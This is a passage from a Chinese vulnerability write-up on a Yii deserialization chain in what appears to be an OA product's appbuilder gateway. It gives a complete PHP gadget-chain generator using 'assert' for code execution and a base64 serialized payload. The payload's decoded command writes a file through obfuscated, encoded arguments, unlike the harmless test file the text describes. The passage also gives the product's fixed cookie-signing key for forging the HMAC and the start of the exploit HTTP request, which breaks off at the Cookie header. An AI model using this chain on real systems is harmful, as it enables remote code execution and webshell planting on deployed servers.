monospace;word-break: break-all;">yii\base\Component（framework/base/Component.php）::trigger()</p>方法，参数<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">EVENT_AFTER_OPEN</p>固定值是<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">afterOpen</p>。</div><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #c678dd;line-height: 26px;">const</span> EVENT_AFTER_OPEN = <span style="color: #98c379;line-height: 26px;">'afterOpen'</span>;<span style="color: #c678dd;line-height: 26px;">protected</span> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">function</span> <span style="color: #61aeee;line-height: 26px;">initConnection</span><span style="line-height: 26px;">()</span>    </span>{        <span style="color: #c678dd;line-height: 26px;">$this</span>->trigger(<span style="color: #c678dd;line-height: 26px;">self</span>::EVENT_AFTER_OPEN);<span style="color: #5c6370;font-style: italic;line-height: 26px;">//$this->trigger('afterOpen');</span>    }</p></pre><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">trigger</p>方法在line560调用了<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">call_user_func</p>，逆向溯源两个<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$handler[0]</p>和<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$event</p>参数。<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->_events[$name]=$this->['afterOpen']</p>不为空，就能进入该分支调用<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">call_user_func</p>。然后对<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->_events['afterOpen']</p>进行数组遍历，于是<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->_events['afterOpen'][0]=$handler[0]</p>可控，<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->_events['afterOpen'][1]=$event->data=Event::data</p>不可控。</div><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #c678dd;line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">function</span> <span style="color: #61aeee;line-height: 26px;">trigger</span><span style="line-height: 26px;">($name, Event $event = null)</span>    </span>{        <span style="color: #c678dd;line-height: 26px;">$this</span>->ensureBehaviors();        <span style="color: #5c6370;font-style: italic;line-height: 26px;">//$this->_events['afterOpen'] = ''</span>        <span style="color: #c678dd;line-height: 26px;">if</span> (!<span style="color: #c678dd;line-height: 26px;">empty</span>(<span style="color: #c678dd;line-height: 26px;">$this</span>->_events[$name])) {            <span style="color: #c678dd;line-height: 26px;">if</span> ($event === <span style="color: #c678dd;line-height: 26px;">null</span>) {                $event = <span style="color: #c678dd;line-height: 26px;">new</span> Event();            }            <span style="color: #c678dd;line-height: 26px;">if</span> ($event->sender === <span style="color: #c678dd;line-height: 26px;">null</span>) {                $event->sender = <span style="color: #c678dd;line-height: 26px;">$this</span>;<span style="color: #5c6370;font-style: italic;line-height: 26px;">//yii\base\Component</span>            }            $event->handled = <span style="color: #c678dd;line-height: 26px;">false</span>;            $event->name = $name;<span style="color: #5c6370;font-style: italic;line-height: 26px;">//'afterOpen'</span>            <span style="color: #5c6370;font-style: italic;line-height: 26px;">//$this->>_events['afterOpen'] = $handler; </span>            <span style="color: #c678dd;line-height: 26px;">foreach</span> (<span style="color: #c678dd;line-height: 26px;">$this</span>->_events[$name] <span style="color: #c678dd;line-height: 26px;">as</span> $handler) {                $event->data = $handler[<span style="color: #d19a66;line-height: 26px;">1</span>];<span style="color: #5c6370;font-style: italic;line-height: 26px;">//any</span>                call_user_func($handler[<span style="color: #d19a66;line-height: 26px;">0</span>],$event);<span style="color: #5c6370;font-style: italic;line-height: 26px;">//call_user_func([new CreateAction,'run'],any);</span>                <span style="color: #5c6370;font-style: italic;line-height: 26px;">// stop further handling if the event is handled</span>                <span style="color: #c678dd;line-height: 26px;">if</span> ($event->handled) {                    <span style="color: #c678dd;line-height: 26px;">return</span>;                }            }        }        <span style="color: #5c6370;font-style: italic;line-height: 26px;">// invoke class-level attached handlers</span>        Event::trigger(<span style="color: #c678dd;line-height: 26px;">$this</span>, $name, $event);    }</p></pre><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">参考低版本yii反序列化链执行代码注入的一般通过<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">yii\rest\CreateAction</p>或者类似的类（代码内容如下所示）。其中<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->checkAccess</p>和<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->id</p>都可控，<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->checkAccess</p>设置为调用php函数，如<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">system</p>执行命令；<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->id</p>设置执行内容，如命令<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">whoami</p>。</div><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #c678dd;line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">function</span> <span style="color: #61aeee;line-height: 26px;">run</span><span style="line-height: 26px;">()</span>    </span>{        <span style="color: #c678dd;line-height: 26px;">if</span> (<span style="color: #c678dd;line-height: 26px;">$this</span>->checkAccess) {            call_user_func(<span style="color: #c678dd;line-height: 26px;">$this</span>->checkAccess, <span style="color: #c678dd;line-height: 26px;">$this</span>->id);        }      ......</p></pre><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">结合上面的<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">trigger</p>方法，<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">call_user_func</p>参数1可以设置为调用<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">CreateAction</p>的<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">run</p>方法，调用方式：<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">call_user_func([new CreateAction, 'run'],'a')</p>。如何给<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->_events['afterOpen']</p>赋值，继续查看如下代码注释：</div><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">           <span style="color: #5c6370;font-style: italic;line-height: 26px;">//$this->>_events['afterOpen'] = $handler; //一重数组，$handler要求是数组</span>            <span style="color: #c678dd;line-height: 26px;">foreach</span> (<span style="color: #c678dd;line-height: 26px;">$this</span>->_events[$name] <span style="color: #c678dd;line-height: 26px;">as</span> $handler) { <span style="color: #5c6370;font-style: italic;line-height: 26px;">//二重数组，$handler分为$handler[0]和handler[1]</span>                $event->data = $handler[<span style="color: #d19a66;line-height: 26px;">1</span>];<span style="color: #5c6370;font-style: italic;line-height: 26px;">//any</span>                call_user_func($handler[<span style="color: #d19a66;line-height: 26px;">0</span>],$event);               <span style="color: #5c6370;font-style: italic;line-height: 26px;">//call_user_func([new CreateAction,'run'],any); </span>                <span style="color: #5c6370;font-style: italic;line-height: 26px;">//三重数组，call_user_func调用类需要用数组传入，形如[new A(),...params]</span></p></pre><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">转换过来也就是<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->_events['afterOpen'] = [[[new CreatAction, 'run'],'a']]</p>。</div><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;">0x02 漏洞复现</h2><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;">1.生成反序列化链</h3><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">该链条效果为写入一个名为<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">hgsd.php</p>的php文件，内容为<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;"><?php echo 123;?></p>。输出反序列化payload的base64编码，解码并urlencode作为伪造的csrf token一部分数据。</div><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #61aeee;line-height: 26px;"><?php</span><span style="color: #5c6370;font-style: italic;line-height: 26px;">//step4</span><span style="color: #c678dd;line-height: 26px;">namespace</span> <span style="color: #61aeee;line-height: 26px;">yii</span>\<span style="color: #61aeee;line-height: 26px;">rest</span> {    <span style="color: #61aeee;line-height: 26px;">class</span> <span style="color: #61aeee;line-height: 26px;">CreateAction</span> {        <span style="color: #61aeee;line-height: 26px;">public</span> $<span style="color: #61aeee;line-height: 26px;">id</span>;        <span style="color: #c678dd;line-height: 26px;">public</span> $checkAccess;        <span style="color: #c678dd;line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">function</span> <span style="color: #61aeee;line-height: 26px;">__construct</span><span style="line-height: 26px;">()</span> </span>{            <span style="color: #c678dd;line-height: 26px;">$this</span>->checkAccess = <span style="color: #98c379;line-height: 26px;">'assert'</span>;            <span style="color: #c678dd;line-height: 26px;">$this</span>->id = <span style="color: #98c379;line-height: 26px;">"file_put_contents('hgsd.php','<?php echo 123;?>')"</span>;        }    }}<span style="color: #5c6370;font-style: italic;line-height: 26px;">//step3</span><span style="color: #c678dd;line-height: 26px;">namespace</span> <span style="color: #61aeee;line-height: 26px;">yii</span>\<span style="color: #61aeee;line-height: 26px;">base</span> {    <span style="color: #61aeee;line-height: 26px;">use</span> <span style="color: #61aeee;line-height: 26px;">yii</span>\<span style="color: #61aeee;line-height: 26px;">rest</span>\<span style="color: #61aeee;line-height: 26px;">CreateAction</span>;    <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">class</span> <span style="color: #e6c07b;line-height: 26px;">Component</span> </span>{        <span style="color: #c678dd;line-height: 26px;">private</span> $_events = [];        <span style="color: #c678dd;line-height: 26px;">private</span> $_behaviors = <span style="color: #d19a66;line-height: 26px;">1</span>;        <span style="color: #c678dd;line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">function</span> <span style="color: #61aeee;line-height: 26px;">__construct</span><span style="line-height: 26px;">()</span> </span>{            <span style="color: #c678dd;line-height: 26px;">$this</span>->_events = [<span style="color: #98c379;line-height: 26px;">"afterOpen"</span> => [[[<span style="color: #c678dd;line-height: 26px;">new</span> CreateAction(), <span style="color: #98c379;line-height: 26px;">"run"</span>], <span style="color: #98c379;line-height: 26px;">"a"</span>]]];           <span style="color: #5c6370;font-style: italic;line-height: 26px;">//第二个"a"参数任意。</span>        }    }}<span style="color: #5c6370;font-style: italic;line-height: 26px;">//step2</span><span style="color: #c678dd;line-height: 26px;">namespace</span> <span style="color: #61aeee;line-height: 26px;">yii</span>\<span style="color: #61aeee;line-height: 26px;">redis</span> {    <span style="color: #61aeee;line-height: 26px;">use</span> <span style="color: #61aeee;line-height: 26px;">yii</span>\<span style="color: #61aeee;line-height: 26px;">base</span>\<span style="color: #61aeee;line-height: 26px;">Component</span>;    <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">class</span> <span style="color: #e6c07b;line-height: 26px;">Connection</span> <span style="color: #c678dd;line-height: 26px;">extends</span> <span style="color: #e6c07b;line-height: 26px;">Component</span></span>{        <span style="color: #c678dd;line-height: 26px;">public</span> $redisCommands = [];        <span style="color: #c678dd;line-height: 26px;">public</span> $hostname = <span style="color: #98c379;line-height: 26px;">''</span>;        <span style="color: #c678dd;line-height: 26px;">public</span> $port;        <span style="color: #c678dd;line-height: 26px;">public</span> $password;        <span style="color: #c678dd;line-height: 26px;">public</span> $username;        <span style="color: #c678dd;line-height: 26px;">public</span> $connectionTimeout;        <span style="color: #c678dd;line-height: 26px;">public</span> $dataTimeout;        <span style="color: #c678dd;line-height: 26px;">public</span> $database;        <span style="color: #c678dd;line-height: 26px;">public</span> $unixSocket;        <span style="color: #c678dd;line-height: 26px;">private</span> $_socket;        <span style="color: #c678dd;line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">function</span> <span style="color: #61aeee;line-height: 26px;">__construct</span><span style="line-height: 26px;">()</span>        </span>{            <span style="color: #c678dd;line-height: 26px;">$this</span>->redisCommands = <span style="color: #c678dd;line-height: 26px;">array</span>(<span style="color: #98c379;line-height: 26px;">'CLOSE CURSOR'</span>);            <span style="color: #c678dd;line-height: 26px;">$this</span>->_socket = <span style="color: #c678dd;line-height: 26px;">false</span>;            <span style="color: #c678dd;line-height: 26px;">$this</span>->hostname = <span style="color: #98c379;line-height: 26px;">'127.0.0.1'</span>;            <span style="color: #c678dd;line-height: 26px;">$this</span>->port = <span style="color: #d19a66;line-height: 26px;">803</span>;<span style="color: #5c6370;font-style: italic;line-height: 26px;">//能够连通的任意本地服务的端口</span>            <span style="color: #c678dd;line-height: 26px;">$this</span>->unixSocket = <span style="color: #c678dd;line-height: 26px;">false</span>;            <span style="color: #c678dd;line-height: 26px;">$this</span>->connectionTimeout = <span style="color: #d19a66;line-height: 26px;">5</span>;            <span style="color: #c678dd;line-height: 26px;">parent</span>::__construct();        }    }}<span style="color: #5c6370;font-style: italic;line-height: 26px;">// step1 </span><span style="color: #c678dd;line-height: 26px;">namespace</span> <span style="color: #61aeee;line-height: 26px;">yii</span>\<span style="color: #61aeee;line-height: 26px;">db</span> {    <span style="color: #61aeee;line-height: 26px;">use</span> <span style="color: #61aeee;line-height: 26px;">yii</span>\<span style="color: #61aeee;line-height: 26px;">redis</span>\<span style="color: #61aeee;line-height: 26px;">Connection</span>;    <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">class</span> <span style="color: #e6c07b;line-height: 26px;">DataReader</span> </span>{        <span style="color: #c678dd;line-height: 26px;">private</span> $_statement;        <span style="color: #c678dd;line-height: 26px;">private</span> $_closed = <span style="color: #c678dd;line-height: 26px;">false</span>;        <span style="color: #c678dd;line-height: 26px;">private</span> $_row;        <span style="color: #c678dd;line-height: 26px;">private</span> $_index = <span style="color: #d19a66;line-height: 26px;">-1</span>;        <span style="color: #c678dd;line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">function</span> <span style="color: #61aeee;line-height: 26px;">__construct</span><span style="line-height: 26px;">()</span>        </span>{            <span style="color: #c678dd;line-height: 26px;">$this</span>->_statement = <span style="color: #c678dd;line-height: 26px;">new</span> Connection();        }    }    <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">class</span> <span style="color: #e6c07b;line-height: 26px;">BatchQueryResult</span> </span>{        <span style="color: #c678dd;line-height: 26px;">public</span> $batchSize = <span style="color: #d19a66;line-height: 26px;">100</span>;        <span style="color: #c678dd;line-height: 26px;">public</span> $each = <span style="color: #c678dd;line-height: 26px;">false</span>;        <span style="color: #c678dd;line-height: 26px;">private</span> $_dataReader;        <span style="color: #c678dd;line-height: 26px;">private</span> $_batch;        <span style="color: #c678dd;line-height: 26px;">private</span> $_value;        <span style="color: #c678dd;line-height: 26px;">private</span> $_key;        <span style="color: #c678dd;line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">function</span> <span style="color: #61aeee;line-height: 26px;">__construct</span><span style="line-height: 26px;">()</span> </span>{            <span style="color: #c678dd;line-height: 26px;">$this</span>->_dataReader = <span style="color: #c678dd;line-height: 26px;">new</span> DataReader();        }            }}<span style="color: #5c6370;font-style: italic;line-height: 26px;">//start</span><span style="color: #c678dd;line-height: 26px;">namespace</span> {    <span style="color: #61aeee;line-height: 26px;">use</span> <span style="color: #61aeee;line-height: 26px;">yii</span>\<span style="color: #61aeee;line-height: 26px;">db</span>\<span style="color: #61aeee;line-height: 26px;">BatchQueryResult</span>;    <span style="color: #c678dd;line-height: 26px;">echo</span> base64_encode(serialize(<span style="color: #c678dd;line-height: 26px;">new</span> BatchQueryResult()));}</p></pre><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;">2. 生成反序列化hash</h3><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">对第一步生成的反序列化payload（base64已编码）进行hash计算，从而生成对应的csrf token另一部分数据。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #61aeee;line-height: 26px;"><?php</span>$pureData=base64_decode(<span style="color: #98c379;line-height: 26px;">'TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjY6e3M6OToiYmF0Y2hTaXplIjtpOjEwMDtzOjQ6ImVhY2giO2I6MDtzOjM2OiIAeWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQAX2RhdGFSZWFkZXIiO086MTc6InlpaVxkYlxEYXRhUmVhZGVyIjo0OntzOjI5OiIAeWlpXGRiXERhdGFSZWFkZXIAX3N0YXRlbWVudCI7TzoyMDoieWlpXHJlZGlzXENvbm5lY3Rpb24iOjEyOntzOjEzOiJyZWRpc0NvbW1hbmRzIjthOjE6e2k6MDtzOjEyOiJDTE9TRSBDVVJTT1IiO31zOjg6Imhvc3RuYW1lIjtzOjk6IjEyNy4wLjAuMSI7czo0OiJwb3J0IjtpOjgwMztzOjg6InBhc3N3b3JkIjtOO3M6ODoidXNlcm5hbWUiO047czoxNzoiY29ubmVjdGlvblRpbWVvdXQiO2k6NTtzOjExOiJkYXRhVGltZW91dCI7TjtzOjg6ImRhdGFiYXNlIjtOO3M6MTA6InVuaXhTb2NrZXQiO2I6MDtzOjI5OiIAeWlpXHJlZGlzXENvbm5lY3Rpb24AX3NvY2tldCI7YjowO3M6Mjc6IgB5aWlcYmFzZVxDb21wb25lbnQAX2V2ZW50cyI7YToxOntzOjk6ImFmdGVyT3BlbiI7YToxOntpOjA7YToyOntpOjA7YToyOntpOjA7TzoyMToieWlpXHJlc3RcQ3JlYXRlQWN0aW9uIjoyOntzOjI6ImlkIjtzOjIxMjoiZmlsZV9wdXRfY29udGVudHModGRfYXV0aGNvZGUoIjVhNGE4LzZGR2g2Z0hFRzEwZnZTN1JocFpVMFhBdm1CNmJJblZpOGpYNWlaTEZ4Vkh3IiwiREVDT0RFIiwiMTIzNDU2Nzg5MCIsIiIpLHRkX2F1dGhjb2RlKCIzMjk4THRaU3RaQWxKRWVma0VJdWJadjVhdU1VS2ZEeWdORmVWcTArT0JobFNYb3p5S1BMNVFMQkxYNlZFdyIsIkRFQ09ERSIsIjEyMzQ1Njc4OTAiLCIiKSkiO3M6MTE6ImNoZWNrQWNjZXNzIjtzOjY6ImFzc2VydCI7fWk6MTtzOjM6InJ1biI7fWk6MTtzOjE6ImEiO319fXM6MzA6IgB5aWlcYmFzZVxDb21wb25lbnQAX2JlaGF2aW9ycyI7aToxO31zOjI2OiIAeWlpXGRiXERhdGFSZWFkZXIAX2Nsb3NlZCI7YjowO3M6MjM6IgB5aWlcZGJcRGF0YVJlYWRlcgBfcm93IjtOO3M6MjU6IgB5aWlcZGJcRGF0YVJlYWRlcgBfaW5kZXgiO2k6LTE7fXM6MzE6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfYmF0Y2giO047czozMToiAHlpaVxkYlxCYXRjaFF1ZXJ5UmVzdWx0AF92YWx1ZSI7TjtzOjI5OiIAeWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQAX2tleSI7Tjt9'</span>);$calculatedHash = hash_hmac(<span style="color: #98c379;line-height: 26px;">'sha256'</span>,$pureData,<span style="color: #98c379;line-height: 26px;">'tdide2'</span>,<span style="color: #c678dd;line-height: 26px;">false</span>); <span style="color: #5c6370;font-style: italic;line-height: 26px;"># yii general/appbuilder/config/web.php cookieValidationKey 固定值</span><span style="color: #c678dd;line-height: 26px;">echo</span>($calculatedHash);</p></pre><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;">3.http报文（漏洞验证）</h3><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">对数据包请求方式没有限制，<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">get和post</p>方式都可以。伪造的csrf token格式是<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">Cookie: _GET=csrftoken_hashmac+反序列化payload urlencode</p>。按照payload格式拼接完毕后，在发送如下请求：</div><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">POST /general/appbuilder/web/portal/gateway/? HTTP/1.1Host: x.x.x.xCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: 